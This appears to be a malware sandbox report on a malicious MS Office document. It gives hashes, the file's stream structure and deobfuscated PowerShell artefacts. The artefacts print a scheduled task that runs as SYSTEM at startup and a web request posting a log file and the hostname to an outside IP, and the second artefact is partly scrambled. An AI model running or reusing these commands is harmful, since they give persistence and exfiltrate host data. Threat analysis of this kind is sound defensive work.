Malicious
Malicious

20d5c18970a8f16235aeaa81ea182e5b

MS Office Document
|
MD5: 20d5c18970a8f16235aeaa81ea182e5b
|
Size: 40.96 KB
|
application/vnd.ms-office

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
20d5c18970a8f16235aeaa81ea182e5b
Sha1
0239f48e872c23a90fefe730920bc6f32ef9f8c5
Sha256
248d4a0174012228e5954b3a40bb3d902e5eb30b549720747ddeac0d7880fd54
Sha384
b72f5eabeaa6feb14e4ceb7a69eaa98a8c3038aeb24a1fd8174e31f94a72e4a482d250617443d187eafb055fc48f22fd
Sha512
b2cb65f8cfe7c9e22f2a1c58ef616878a8008826a9fc766de4cfd21c0b074181c7fd262d14ca62ce8b2ed0f76e82ad062548eebe1702d9d8eaaf00879475534e
SSDeep
384:ozY+DalIyDenei7edaUen5YPeToW3T1XFFM69q5ICUV1XFFM6ztcq5ICVbi:Is+yDcei7dUcKP6hRjqmCUz56qmC
TLSH
4103F65BB390D332D44203714A6FC7E59F74AC949F621116326AF34C6E72ED422E79E2
File Structure
20d5c18970a8f16235aeaa81ea182e5b
Malicious
Root Entry
Malicious
䡀䌏䈯
䄦㡥䆾䅤
Malicious
filmJytTOF_2Xf_D8xmvHCZGa_QdAg
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
䡀䈖䌧䠤
䡀㬿䏲䐸䖱
䡀㽿䅤䈯䠶
䡀䈏䗤䕸䠨
䡀䓞䕪䇤䠨
䡀䕙䓲䕨䜷
䡀䌍䈵䗦䕲䠼
䡀䒌䓰䑲䑨䠷
䡀㼿䕷䑬㭪䗤䠤
䡀㼿䕷䑬㹪䒲䠯
䡀㿿䏤䇬䗤䒬䠱
䡀䖖㯬䏬㱨䖤䠫
䡀䘌䗶䐲䆊䌷䑲
䡀䄕䑸䋦䒌䇱䗬䒬䠱
䡀䇊䌰㾱㼒䔨䈸䆱䠨
䡀䈏䗤䕸㬨䐲䒳䈱䗱䠶
䡀䑒䗶䏤㾯㼒䔨䈸䆱䠨
䡀䇊䌰㮱䈻䘦䈷䈜䘴䑨䈦
䡀䇊䗹䛎䆨䗸㼨䔨䈸䆱䠨
䡀䑒䗶䏤㮯䈻䘦䈷䈜䘴䑨䈦
SummaryInformation
filmJytTOF_2Xf_D8xmvHCZGa_QdAg
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "log" "to" "server..." echo. ipconfig echo. powershell -Command "^" "Invoke-WebRequest -Uri 'http://45.61.130.146/log.php' -Method Post -Body @{log=(Get-Content 'C:\InstallNebula_bat.log' -Raw); hostname=$env:COMPUTERNAME} -ContentType 'application/x-www-form-urlencoded'" ^ >> "%BAT_LOG%" exit
Deobfuscated PowerShell

^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Send" echo%bat_log% el "." >> "!SCRIPT!" "tType" "application/x-wplication/x-ww G%" el "." >> "!SCRIPT!s==ion $NewDataRo n Out-Null >> I a ai dow " "P" "c" "osoft\Windows" "egroundColor" "Gndowssuccessfully" "se" "cessfu-l" "osoft\Windows-olor" "Green" >> "Gndowssuccessfully" "seiBAdowss" ed "." "il" " tart ^ /delao .l Remove-NetFirewallRul/xs -!SCRIPT!" "echo" "cho" >> "!SCRIPT!" "echo."
20d5c18970a8f16235aeaa81ea182e5b (40.96 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙